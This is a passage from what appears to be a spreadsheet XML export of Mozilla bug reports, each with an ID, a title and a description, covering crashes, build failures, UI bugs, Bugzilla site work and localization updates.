indexer.js creates a hdr enumerator and enumerates over the headers of a db looking for non-indexed message. For a folder that's mostly indexed this generates a lot of garbage nsIMsgDBHdrs that aren't needed and causes the cycle collector to block for long periods of time. Using the filter enumerator to find hdrs to index should produce a lot less garbage.</t>
  </si>
  <si>
    <t>CORE-473517</t>
  </si>
  <si>
    <t>Remove heap allocated nsSVGLength in nsSVGUtils::CoordToFloat</t>
  </si>
  <si>
    <t>nsSVGUtils::CoordToFloat uses a short lived heap allocated nsSVGLength to do a calculation. This can be replaced with a stack allocated nsSVGLength2 to get the same effect.</t>
  </si>
  <si>
    <t>BUGZILLA-330519</t>
  </si>
  <si>
    <t>Remove unused IsInClassification() function from globals.pl</t>
  </si>
  <si>
    <t>IsInClassification() isn't used at all.</t>
  </si>
  <si>
    <t>SEAMONKEY-765175</t>
  </si>
  <si>
    <t>ReferenceError: getPref is not defined in addressingWidgetOverlay.js (Regression from Bug 713671).</t>
  </si>
  <si>
    <t>Timestamp: 15/06/2012 4:48:50 PM
Error: ReferenceError: getPref is not defined
Source File: chrome://messenger/content/messengercompose/addressingWidgetOverlay.js
Line: 23
addressingWidgetOverlay.js is used in several places not just in messageCompose where getPref() is defined.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-219314</t>
  </si>
  <si>
    <t>fix broken link to The Cathedral and the Bazaar</t>
  </si>
  <si>
    <t>fix a broken link to a docoment on redhat.com</t>
  </si>
  <si>
    <t>CORE-211470</t>
  </si>
  <si>
    <t>A nsIURI-based hashtable key could be useful</t>
  </si>
  <si>
    <t>For example we have code duplication between
http://lxr.mozilla.org/seamonkey/source/content/xul/document/src/nsXULPrototypeCache.cpp#126
and
http://lxr.mozilla.org/seamonkey/source/content/html/style/src/nsCSSLoader.h#80</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-373438</t>
  </si>
  <si>
    <t>conformance tests section is obsolete</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
The information in the conformance tests section is no longer true. For example there is no builddir/extensions/transformiix folder under a seamonkey build transformiix was moved out of extensions a while back.
And there is no XSLT QA submenu on the QA menu.
My solution is to replace all this info about getting and running the Xalan tests with a link to the wiki page http://wiki.mozilla.org/XSLT_Tests
(I was able to update the wiki page to be current.)
Please see attached patch.
If it's not a good idea to have the wiki page be the primary source of info someone may want to copy the wiki page to this page.
Reproducible: Always
Steps to Reproduce:
1. Browse to http://www.mozilla.org/projects/xslt/qa/index.html
2. Following instructions under Building try to go to your builddir/extensions/transformiix folder.
3.
Actual Results:  
There is no such folder.
Expected Results:  
There is such a folder.
Have attached a patch.</t>
  </si>
  <si>
    <t>BUGZILLA-93006</t>
  </si>
  <si>
    <t>Changing several bug at once defaults to Reassign checkbox.</t>
  </si>
  <si>
    <t>1. Query bugzilla based on some conditions.
2. Click Change several bugs at once link.
3. Select the drop down list box to resolve the bug to Wontfix.  Note that the 
checkbox for Reassign is selected.</t>
  </si>
  <si>
    <t>skasinathan</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-267687</t>
  </si>
  <si>
    <t>Update of Catalan (ca-AD) Firefox 1.0 translation</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 ca-AD rv:1.7.3) Gecko/20041026 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 ca-AD rv:1.7.3) Gecko/20041026 Firefox/1.0
* Full help in Catalan -&gt; Zip file with the content.
* Translation of an untranslated string in mozapps/update -&gt; Patch attached
* Little correction in installer.inc -&gt; Patch attached
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>toniher</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-316353</t>
  </si>
  <si>
    <t>Support range for other datatypes than numbers</t>
  </si>
  <si>
    <t>The spec. states that range should support: xsd:duration xsd:date xsd:time xsd:dateTime xsd:gYearMonth xsd:gYear xsd:gMonthDay xsd:gDay xsd:gMonth xsd:float xsd:decimal xsd:double</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-494947</t>
  </si>
  <si>
    <t>Repeated build failures on moz2-darwin9-slave02 &amp; bm-xserve22</t>
  </si>
  <si>
    <t>There have been more oranges than usual on Mac boxes today including:
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1243367145.1243367153.28846.gz&amp;fulltext=1
and
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1243364201.1243364208.22727.gz&amp;fulltext=1
Both of which have an update failed message within them but no error auto-parsed out.
Possibly related is a mac unit test box failure:
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1243362575.1243362584.19658.gz&amp;fulltext=1
which reports:
abort: error: Temporary failure in name resolution
abort: error: Temporary failure in name resolution
Haven't seen this on 191 yet.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-416757</t>
  </si>
  <si>
    <t>esc shell broken</t>
  </si>
  <si>
    <t>Created attachment 302511
bring the shell inline with the recent ESC changes
The update to the front-end appears to have broken the main.es 'shell'.
%sh ./main.sh
es&gt; print(1+1)
TypeError: Error #1009: Cannot access a property or method of a null object reference.
        at cg()[../src/cogen.es:122]
        at evalString()[../src/main.es:55]
        at global$init()[../src/main.es:71]
Attaching a patch to address this.</t>
  </si>
  <si>
    <t>SEAMONKEY-241009</t>
  </si>
  <si>
    <t>Download progress dialog doesn't update the buttons when complete (100% of Saved)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux ppc en-US rv:1.8a) Gecko/20040417
Build Identifier: Mozilla/5.0 (X11 U Linux ppc en-US rv:1.8a) Gecko/20040417
Note concerning my configuration: In the Downloads preferences I've chosen
Open a progress dialog and Keep this window open after the download is
complete is unchecked in any progress dialog.
When I shift-click on any link the download occurs normally until it completes
(the window title of the progress dialog showing 100% of Saved). At this
point the buttons state remains as before: Cancel and Pause are shown and are
still active. It is impossible to close the progress dialog window except via
the window manager (in particular clicking on the Cancel button has no effect).
Reproducible: Always
Steps to Reproduce:
1. Launch Mozilla.
2. Open some page having links.
3. Shift-click on a link (I've tried different servers including the Google URL
above).
Actual Results:  
When the download is complete the progress dialog shows active Cancel and Pause
buttons.
Expected Results:  
The Cancel button should be replaced by a Close button as before.
This seems to be a new bug (it didn't occur in a 1.7b snapshot I compiled 3
weeks ago). I don't know if there's any particular relation with bug 232169.</t>
  </si>
  <si>
    <t>download</t>
  </si>
  <si>
    <t>CORE-330107</t>
  </si>
  <si>
    <t>pango font backend truncates float values to ints</t>
  </si>
  <si>
    <t>We use PANGO_SCALE in a few places which is an integer value -- truncating our result that we otherwise return as a float.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-483671</t>
  </si>
  <si>
    <t>Password engine isn't getting correct hostname</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3
Build Identifier: Weave 0.2.113 FF3.1b3
Running two instances of Weave (both FF3.1b3 Weave0.2.113 and Mac OS X
At first it worked OK but after 1 day I get WARN messages in activity log:
2009-03-16 21:07:14 Engine.Passwords INFO Applied 96 records reconciled 0 records
2009-03-16 21:07:14 Engine.Passwords WARN Error while applying incoming record: 'Can't add a login with a null or empty hostname.' when calling method: [nsILoginManager::addLogin]
2009-03-16 21:07:14 Store.PasswordStore DEBUG Adding login for undefined
There are a lot of Adding login for undefined messages in the log file (apx 65 of them).
On a notebook (Macbook) I get
Engine.Passwords INFO Applied 161 records reconciled 1
which is interesting. Even if I run it more than once.
Reproducible: Always
Steps to Reproduce:
1. Wait for the scheduled sync to kick in or...
2. trigger the sync manually
3.
Actual Results:  
Passwords don't get synced across.
Expected Results:  
Passwords should get synced and hostnames should be resolved properly</t>
  </si>
  <si>
    <t>miha.valencic</t>
  </si>
  <si>
    <t>CORE-15604</t>
  </si>
  <si>
    <t>startup crash in PrepareAndDispatch (solaris/native optimized)</t>
  </si>
  <si>
    <t>apprunner crashes on startup in an optimized build (--disable-debug
--enable-optimize) on Solaris/native(4.2) with a 10/5 morning CVS pull.
The same source tree built in normal debug mode runs fine.  The crash
happens quite early:
(dbx) run
Running: apprunner
(process id 13599)
Warning: MOZILLA_FIVE_HOME not set.
Reading symbolic information for libjsloader.so
Reading symbolic information for libxpconnect.so
t@1 (l@1) signal SEGV (no mapping at the fault address) in PrepareAndDispatch at
0xff203ce8
0xff203ce8: PrepareAndDispatch+0x000c:  ld      [%i0] %l0
Current function is PL_HashTableEnumerateEntries
  368               rv = (*f)(he n arg)
(dbx) where
current thread: t@1
  [1] PrepareAndDispatch(0x80000000 0x40000 0xffbef0a0 0x6c2d8 0xb2468
0xfeccf444) at 0xff203ce8
  [2] 0xff204854(0x80000000 0x4 0xffbef0a0 0x6c2d8 0xfed25524 0xff203f44)
at 0xff204853
  [3] mozJSComponentLoader::AutoRegisterComponent(0x80000000 0x57458 0x0
0xffbef0bc 0xfed25128 0x3f128) at 0xfed13e0c
  [4] mozJSComponentLoader::RegisterComponentsInDir(0x3f128 0x80000000
0x6c260 0xfed25128 0x57430 0x0) at 0xfed137c4
  [5] AutoRegister_enumerate(0x57c88 0x3f128 0xffbef2ec 0xff1eeb54
0xff3dc9d0 0x5a) at 0xff1eeb84
  [6] _hashEnumerate(0x1 0x0 0xffbef280 0xff3dd2c8 0xff3dc9d0 0x6a) at
0xff1c40a4
=&gt;[7] PL_HashTableEnumerateEntries(ht = 0x28980 f = 0xff1c4090 =
&amp;_hashEnumerate() arg = 0xffbef280) line 368 in plhash.c
  [8] nsHashtable::Enumerate(0x28320 0xff1eeb54 0xffbef2ec 0x2a950
0xff221aec 0x17) at 0xff1c4544
  [9] nsComponentManagerImpl::AutoRegister(0x6c260 0x0 0x0 0xff221aec
0x80000000 0x2a950) at 0xff1ef0c8
  [10] nsComponentManager::AutoRegister(0x0 0x0 0x11a1c 0x56b48 0x0 0x0)
at 0xff1f48b8
  [11] NS_SetupRegistry_1(0x0 0xff22bb04 0x56b48 0x2766c 0xfee3ac90 0x3f8)
at 0x1496c
  [12] main1(0x1 0xffbef64c 0x80000000 0xfee37be4 0x26370 0x2a950) at
0x12e6c
  [13] main(0x1 0xffbef64c 0x26370 0x26400 0x0 0x0) at 0x1392c
(dbx) p f
f = 0xff1c4090 = &amp;_hashEnumerate()
(dbx) p *he
*he = {
    next    = (nil)
    keyHash = 1954228146U
    key     = 0x57c88
    value   = 0x3f128
}
(dbx) p n
n = 0
(dbx) p arg
arg = 0xffbef280</t>
  </si>
  <si>
    <t>TOOLKIT-313653</t>
  </si>
  <si>
    <t>Find bar gives incorrect results with tabs--Highlight all does not update</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051024 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051024 Firefox/1.6a1
The Find bar background color is supposed to be red if the string is not found and white if it is found.  The toolbar also displays a Phrase not found notice if the string is not found.  When switching between tabs pressing the Highlight all button will cause highlighting to be updated but not the background color or Phrase not found notice.  This gives the user false information about whether the search string is found.
Reproducible: Always
Steps to Reproduce:
Note:  steps to reproduce will work with virtually any Web site not just the examples.
1.Begin finding when you begin typing should not be checked.
2.In a new browser window open http://www.mozilla.org/projects/deerpark/alpha2.html .  In a new tab open http://www.mozilla.org/support/ and switch to that tab.
3.Press F to open the Find box.
4.Search for a string that is on the first tab but not on this tab.  Example: broken (without quote marks).
5. Switch back to the first tab.  Press Highlight all.
6. In the first tab search for a string that is present on this tab but not on the second.  Example:  Reporter tool (without the quotes).
7. Switch to the second tab and press Highlight all.
Actual Results:  
Background is still red after step 5 and white after step 7.  Phrase not found is still displayed after step 5.
Expected Results:  
Red background and Phrase not found should be updated after pressing Highlight all.  Background should be white after step 5 and red after step 7.  Phrase not found should not be displayed after step 5.
Also verified for Linux and Windows 98SE.</t>
  </si>
  <si>
    <t>BUGZILLA-223043</t>
  </si>
  <si>
    <t>The Bugzilla website needs an overhaul</t>
  </si>
  <si>
    <t>This has been on the back-burner for a long time (I have extremely unfinished
prototype pages in a local directory here that are almost a year old) but given
the focus-shift of Mozilla and their upcoming site overhaul we should really
get moving on this so we don't taint mozilla.org's image. )  For as much as we
act like an independent entity we are still a mozilla.org product and they
even grace us with a link to our website right on their main page as of a couple
months ago.
We need to redo the bugzilla.org website along the same design philosophy... 
i.e. the main page should make it very easy for people to find out what Bugzilla
is where to get it and where to go for more resources.
Design goals:
We need distinct areas of the site for:
 * Marketing Info - stuff for folks who are considering using Bugzilla
 * Administrators - stuff for folks who get to admin a Bugzilla installation
 * Developers - stuff for people who are contributing to the project
 * perhaps a section for Bugzilla end-users?
The main page should have more marketing info and less news.
I *don't* have time to do this myself.  Some ways you can help:
 * provide design input
 * provide designs (HTML mockups etc)
Once we have a general idea of where we're going we can probably file bugs for
individual tasks and turn this into a metabug.
I would prefer the primary discussion on this to remain on the
developers@bugzilla.org mailing list until we know where we're going.</t>
  </si>
  <si>
    <t>CORE-208309</t>
  </si>
  <si>
    <t>there is no Bidi/Joining algorithm on Arabic/Persian texts in MathML</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3.1) Gecko/20030425
Build Identifier: 
MathML render on Linux doesn't make any bidi/joining algorithm for
arabic/persian texts and show them in Isolated form in LTR mode.
Reproducible: Always
Steps to Reproduce:
1. Take a look at http://esfahbod.info/proj/web/xml/farsi/math.xms with Mozilla
on a Linux OS.
Actual Results:  
it is wrong! in MS Windows it looks right.  You can see correct render with
Mozilla 1.3.1 on WinXP in next attachment.
Expected Results:  
It must looks like attachment.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-901640</t>
  </si>
  <si>
    <t>Commit Access (Level 1) for Patrick Brosset</t>
  </si>
  <si>
    <t>Created attachment 785896
id_rsa.pub
User Agent: Mozilla/5.0 (Macintosh Intel Mac OS X 10.8 rv:25.0) Gecko/20130718 Firefox/25.0 (Nightly/Aurora)
Build ID: 20130718030201
Steps to reproduce:
Email address: pbrosset@mozilla.com
Sending the signed committer's aggreement to Shannon Armitage now.</t>
  </si>
  <si>
    <t>patrickbrosset</t>
  </si>
  <si>
    <t>CORE-17912</t>
  </si>
  <si>
    <t>XPCOM Shutdown needs be observable</t>
  </si>
  <si>
    <t>This is to get services shutting down properly xpcom needs to host a
xpcomShutdown observable.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-299793</t>
  </si>
  <si>
    <t>group focus doesn't work if not bound</t>
  </si>
  <si>
    <t>Trying to set focus to a group works properly if the group is bound.  Focus will
properly go to the first control that the group contains.  However if the group
is NOT bound focus will not be properly set.  This is because in
nsXFormsGroupElement::TryFocus we test for GetRelevantState() returning
PR_TRUE.  This won't be the case if not bound.  GetRelevantState() looks
specifically for the existance of the enabled attribute.  
Two approaches:
1) Maybe a better test is for TryFocus to look for the existance of the
disabled attribute and if not there call that good enough.  
2) Make enabled a default attribute for unbound controls.
#1 will cause less headaches but maybe we should make it so that a control that
isn't disabled really is enabled or otherwise an author's styling may not work
as the author anticipates.  Allan?</t>
  </si>
  <si>
    <t>SOCORRO-463250</t>
  </si>
  <si>
    <t>Php WebApp is brittle with unexpected values</t>
  </si>
  <si>
    <t>On looking up a crashdump by uuid the WebApp can display a runtime error with stack trace if the database returns unexpected values. See http://crash-reports-php.stage.mozilla.com/report/index/a88c2b2d-5125-475b-ad30-88f720081104 as an example.
To allow for a future retry of failed jobs and allow a user to see that their job may have failed the processor adds a record to the jobs table without regard for the success or failure of that job.  When a job fails NULL values may exist in many of the columns of the reports table.  Simply checking for the column 'success' being true is no guarantee that there are no unexpected NULLs.  
The webapp should be coded to take these unexpected values into account.
Feel free to reassign this bug to a more appropriate person as needed.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-279979</t>
  </si>
  <si>
    <t>Possible buffer overrun in nsFontMetricsPh::Init</t>
  </si>
  <si>
    <t>The sprintf into prop[256] in nsFontMetricsPh::Init seems like it could overrun
the size of the buffer. I'd suggest using a safer printf function from NSPR or
using simple string join-operators.</t>
  </si>
  <si>
    <t>amardare</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-430820</t>
  </si>
  <si>
    <t>qm-centos5-02 unit test machine is busted</t>
  </si>
  <si>
    <t>It's failing to build with the following errors:
checking host system type... mkdir: cannot create directory `/tmp/cg5617-7781': Read-only file system
mkdir: cannot create directory `/tmp/cg-5617': Read-only file system
config.guess: cannot create a temporary directory in /tmp
configure: error: can not guess host type you must specify one</t>
  </si>
  <si>
    <t>NSS-457984</t>
  </si>
  <si>
    <t>Enable PKCS11 module logging in optimized builds</t>
  </si>
  <si>
    <t>The most helpful tool for debugging problems with PKCS#11 modules is 
the PKCS#11 module logging facility in NSS.  Unfortunately it is presently
only found in debug builds.  So every time some user in the field has a 
problem we have to find a way to get that user a debug build to log the 
problems.  This has recently become MUCH more difficult to do on Windows.
So I propose that we enable the PKCS#11 module logger by default in 
Optimized builds.  This can be done by a very small change to the file
nss/lib/pk11wrap/pk11load.c near line 51 which reads
51 #ifdef DEBUG
52 #define DEBUG_MODULE 1
53 #endif
Simply removing lines 51 and 53 would do.  
Alternatively changing line 51 to read 
#if defined(DEBUG) || defined(some other symbol)
and then defining that other symbol in the Makefile would also do.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-410651</t>
  </si>
  <si>
    <t>Crash running dehydra on nsXPComInit.ii</t>
  </si>
  <si>
    <t>With one of the latest dehydra commits dehydra now crashes on nsXPComInit.ii (XPCOMGC branch). I will attach the .ii file here for reproduction. It appears to be trying to process the declaration of MMgc::GCStack:
0x0000000000418303 in JSVisitor::visitE_new (this=0x7fffe3823970 e=0x2ed9310) at dehydra_js.cc:231
231       e-&gt;ctorStatement-&gt;traverse(this-&gt;loweredVisitor)
#0  0x0000000000418303 in JSVisitor::visitE_new (this=0x7fffe3823970 e=0x2ed9310) at dehydra_js.cc:231
#1  0x000000000040629d in ExpressionVisitor::visitExpression (this=0x7fffe3823970 e=0x2ed9310) at expr_visitor.cc:103
#2  0x0000000000415adc in JSVisitor::visitExpression (this=0x7fffe3823970 e=0x2ed9310) at dehydra_js.cc:416
#3  0x00000000004708ec in DelegatorASTVisitor::visitExpression (this=0x7fffe3823980 obj=0x2ed9310) at cc.ast.gen.cc:7269
#4  0x000000000052d6c5 in LoweredASTVisitor::visitExpression (this=0x7fffe3823980 expr=0x2ed9310) at ../elsa/cc_ast_aux.cc:334
#5  0x000000000045a942 in E_new::traverse (this=0x2ed9310 vis=@0x7fffe3823980) at cc.ast.gen.cc:6478
#6  0x0000000000457b31 in IN_expr::traverse (this=0x2ed9380 vis=@0x7fffe3823980) at cc.ast.gen.cc:6696
#7  0x0000000000417cd0 in JSVisitor::visitS_decl (this=0x7fffe3823970 s=0x2ed9430) at dehydra_js.cc:535
#8  0x0000000000406c4c in ExpressionVisitor::visitStatement (this=0x7fffe3823970 s=0x2ed9430) at expr_visitor.cc:38
#9  0x0000000000415688 in JSVisitor::visitStatement (this=0x7fffe3823970 s=0x2ed9430) at dehydra_js.cc:644
#10 0x0000000000470a78 in DelegatorASTVisitor::visitStatement (this=0x7fffe3823980 obj=0x2ed9430) at cc.ast.gen.cc:7242
#11 0x000000000052d888 in LoweredASTVisitor::visitStatement (this=0x7fffe3823980 stmt=0x2ed9430) at ../elsa/cc_ast_aux.cc:318
#12 0x000000000045b2dc in S_decl::traverse (this=0x2ed9430 vis=@0x7fffe3823980) at cc.ast.gen.cc:6111
#13 0x000000000045bc02 in S_compound::traverse (this=0x3703ff0 vis=@0x7fffe3823980) at cc.ast.gen.cc:6005
#14 0x00000000004148ca in JSVisitor::traverse (this=0x7fffe3823970 s=0x3703ff0) at dehydra_js.cc:637
#15 0x000000000042566d in CFBlock::traverse (this=0x3703f90 vis=@0x7fffe3823970 guard=@0x7fffe3822fc0 stateCycleGuard=@0x7fffe3823080 
    entryCondition=0x2ecfe60) at dehydra_cf_block.cc:156
#16 0x000000000042570c in CFBlock::traverse (this=0x7fffe3823420 vis=@0x7fffe3823970 guard=@0x7fffe3823160 
    stateCycleGuard=@0x7fffe3823080 entryCondition=0x0) at dehydra_cf_block.cc:169
#17 0x000000000041898e in JSVisitor::nextFunction (this=0x7fffe3823970 f=0x1e16ec0 entry=@0x7fffe3823420) at dehydra_js.cc:600
#18 0x0000000000418cbb in JSVisitor::visitFunction (this=0x7fffe3823970 f=0x1e16ec0) at dehydra_js.cc:690
#19 0x00000000004711a4 in DelegatorASTVisitor::visitFunction (this=0x7fffe3823980 obj=0x1e16ec0) at cc.ast.gen.cc:7116
#20 0x000000000052d9e1 in LoweredASTVisitor::visitFunction (this=0x7fffe3823980 func=0x1e16ec0) at ../elsa/cc_ast_aux.cc:285
#21 0x000000000045ae28 in Function::traverse (this=0x1e16ec0 vis=@0x7fffe3823980) at cc.ast.gen.cc:5451
#22 0x000000000045b0f8 in MR_func::traverse (this=0x1e16f30 vis=@0x7fffe3823980) at cc.ast.gen.cc:5735
#23 0x000000000045b63f in MemberList::traverse (this=0x1e17310 vis=@0x7fffe3823980) at cc.ast.gen.cc:5703
#24 0x000000000045b818 in TS_classSpec::traverse (this=0x1e17330 vis=@0x7fffe3823980) at cc.ast.gen.cc:5630
#25 0x000000000052ddb4 in LoweredASTVisitorHelper::oneTempl (this=0x7fffe3823a30 var0=0x1e14f00) at ../elsa/cc_ast_aux.cc:19
#26 0x000000000052de4f in LoweredASTVisitorHelper::oneContainer (this=0x7fffe3823a30 container=0x1cf6d10) at ../elsa/cc_ast_aux.cc:47
#27 0x000000000052df35 in LoweredASTVisitorHelper::oneVariable (this=0x7fffe3823a30 tinfoVar=0x1cf6d10) at ../elsa/cc_ast_aux.cc:70
#28 0x000000000052dff4 in LoweredASTVisitorHelper::visitTypeSpecifier0 (this=0x7fffe3823a30 spec=0xac4d30) at ../elsa/cc_ast_aux.cc:105
#29 0x000000000052e0b6 in LoweredASTVisitorHelper::subvisitTS_classSpec (this=0x7fffe3823a30 spec=0xac4d30) at ../elsa/cc_ast_aux.cc:129
#30 0x000000000052dca6 in LoweredASTVisitorHelper::visitTypeSpecifier (this=0x7fffe3823a30 spec=0xac4d30) at ../elsa/cc_ast_aux.cc:113
#31 0x000000000045b706 in TS_classSpec::traverse (this=0xac4d30 vis=@0x7fffe3823a30) at cc.ast.gen.cc:5616
#32 0x000000000045b1e8 in Declaration::traverse (this=0xac4d80 vis=@0x7fffe3823a30) at cc.ast.gen.cc:5498
#33 0x000000000045c0d5 in TD_decl::traverse (this=0xac4da0 vis=@0x7fffe3823a30) at cc.ast.gen.cc:6787
#34 0x0000000000529873 in LoweredASTVisitor::visitTemplateDeclaration (this=0x7fffe3823980 templDecl=0xac4da0) at ../elsa/cc_ast_aux.cc:254
#35 0x000000000045c0a1 in TD_decl::traverse (this=0xac4da0 vis=@0x7fffe3823980) at cc.ast.gen.cc:6783
#36 0x000000000045492b in TF_template::traverse (this=0xac4dc0 vis=@0x7fffe3823980) at cc.ast.gen.cc:5377
#37 0x000000000045a26a in TF_namespaceDefn::traverse (this=0xac5350 vis=@0x7fffe3823980) at cc.ast.gen.cc:5430
#38 0x000000000045a3b3 in TranslationUnit::traverse (this=0x9c9090 vis=@0x7fffe3823980) at cc.ast.gen.cc:5334
#39 0x000000000042e0db in Dehydra::traverse (this=0x7fffe3823cb0 cmd=@0x9c3ed0) at dehydra.cc:29
#40 0x00000000004c0645 in main (argc=4 argv=0x7fffe3823ec8) at dehydra_main.cc:28
e-&gt;ctorStatement is null... I'm guessing that it refers to the 'int' and is being confused because it's a primitive type instead of a class but I'm not sure of this.</t>
  </si>
  <si>
    <t>BUGZILLA-174922</t>
  </si>
  <si>
    <t>Bugzilla documentation is too vague about bonsaitools</t>
  </si>
  <si>
    <t>The current Bugzilla documentation at http://www.bugzilla.org/docs/html/
says the following in section 4.1.7 Bugzilla:
Lastly you'll need to set up a symbolic link to /usr/bonsaitools/bin/perl for 
the correct location of your Perl executable (probably /usr/bin/perl).
It is safe to say that not everyone is familiar with bonsaitools at the time
of Bugzilla installation/configuration. What is bonsaitools? Is it required for
Bugzilla? If so how does it install/work? What if I donÂ´t have it? etc.</t>
  </si>
  <si>
    <t>markus.harju</t>
  </si>
  <si>
    <t>CORE-448548</t>
  </si>
  <si>
    <t>XSLT creates documents which don't have script handling objects</t>
  </si>
  <si>
    <t>This may cause similar problems as bug 393761 and bug 393762.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-444615</t>
  </si>
  <si>
    <t>Create a nice and intuitive contribution section / page</t>
  </si>
  <si>
    <t>Current contribution page: http://www.mozilla.org/contribute/
At the moment the contribution page isn't very motivating. Furthermore it doesn't list all ways of participation and doesn't give tips or a description which tasks require which skills and experience. A good start would be the OpenOffice contribution page http://contributing.openoffice.org/</t>
  </si>
  <si>
    <t>CORE-455749</t>
  </si>
  <si>
    <t>Update regionNames.properties</t>
  </si>
  <si>
    <t>Created attachment 339096
Update the file
There are now 246 entries in http://www.iso.org/iso/country_codes/iso_3166_code_lists/english_country_names_and_code_elements.htm but we only have 243. There are in fact 4 new entries that should be added:
bl - Saint BarthÃ©lemy
me - Montenegro
mf - Saint Martin
rs - Serbia
As one might expect from the above one of our entries should be removed: cs - Serbia and Montenegro.</t>
  </si>
  <si>
    <t>CORE-240240</t>
  </si>
  <si>
    <t>[FIXr]Possible double-delete of style set</t>
  </si>
  <si>
    <t>If the presshell's Init() fails after it sets mStyleSet it will delete the
style set and so will the document viewer.
We really need to clean up this code.  :(</t>
  </si>
  <si>
    <t>CORE-344215</t>
  </si>
  <si>
    <t xml:space="preserve"> with no attributes triggers ASSERTION: getElementById() fix caller?</t>
  </si>
  <si>
    <t xml:space="preserve"> with no attributes triggers ASSERTION: getElementById() fix caller?.
Bug 296237 covers turning this assertion into some kind of warning but I don't think the warning there would be appropriate for just having a  with no attributes.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-449856</t>
  </si>
  <si>
    <t>[te] Migrate CVS over to hg</t>
  </si>
  <si>
    <t>We'll need a good point to migrate the content in cvs for te over to an hg repository beneath http://hg.mozilla.org/l10n-central/
Please follow up to this bug when you think you're ready setting the status whiteboard to a timestamp you'd consider good.
Please don't land content in hg yourself before the initial migration is done we want to make sure that the initial content in hg maps a cvs tag so that we can fix up hg annotate on the website to refer to cvs blame at one point.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-255872</t>
  </si>
  <si>
    <t>typo in browser/locales/Makefile.in</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a3) Gecko/20040817
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a3) Gecko/20040817
there is a missing slash in browser/locale/Makefile.in which cause a build error 
with current Aviary_1_0_*_branch
Reproducible: Always
Steps to Reproduce:
.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-492977</t>
  </si>
  <si>
    <t>Version Control</t>
  </si>
  <si>
    <t>vcs update does not work</t>
  </si>
  <si>
    <t>Reported by JuanPablo on the mailing list:
I clone
vcs clone ssh://hg@bitbucket.org/my_repository
and in other pc clone make changes commit and push
&gt; hg commit -m new changes ...
&gt; hg push
... ok
now if try update in bespin ...
&gt; vcs update
...
get this output
vcs update output
hg fetch: invalid arguments
hg fetch [SOURCE]
pull changes from a remote rep ....
- note from Kevin:
I can reproduce this on bespin.mozilla.com. I don't know for sure what is being 
passed to hg fetch but it looks like it *should* be working.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-394911</t>
  </si>
  <si>
    <t>URLs aren't rewritten to put $locale in them</t>
  </si>
  <si>
    <t>Going to /firefox/ off the root of an install should redirect to /en-US/firefox/.  Instead it just loads the en-US content with no redirection.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-250531</t>
  </si>
  <si>
    <t>nsImageGTK::LockImagePixels(PR_TRUE) does not retrieve mAlphaBits</t>
  </si>
  <si>
    <t>Calling LockImagePixels(PR_TRUE) should allow the alpha mask to be accessed via
GetAlphaBits().  However if the alpha mask has been stored onto a server-side
pixmap (mAlphaPixmap) LockImagePixels does not fetch the image data into
mAlphaBits.</t>
  </si>
  <si>
    <t>THUNDERBIRD-307527</t>
  </si>
  <si>
    <t>Connection timeout with IMAP on dual core systems</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20050907 Thunderbird/1.6a1 ID:2005090706
When 2 or more account is exist on 1 imap server
and do Get All New Messages
then the dialog Connection to  time out. appear many times.
I show time problem with trunk and 1.8 branch.
but do not show it with 1.0.6.
Reproducible: Always
Steps to Reproduce:
1. make 2 or more account on 1 imap server
2. add the accounts to the thunderbird
3. do Get All New Messages
Actual Results:  
the dialog Connection to  time out. appear many times.
Expected Results:  
no dialog.
I use the Classic Hamster (build 2.0.7) as imap server on local host.
It happen with dual core (Athlon 64 X2 3800+)
and it don't happen with single core (PenIII 800MHz).</t>
  </si>
  <si>
    <t>fasano</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-224215</t>
  </si>
  <si>
    <t>Edit Attribute says Enter the attribute name instead of Enter the attribute value</t>
  </si>
  <si>
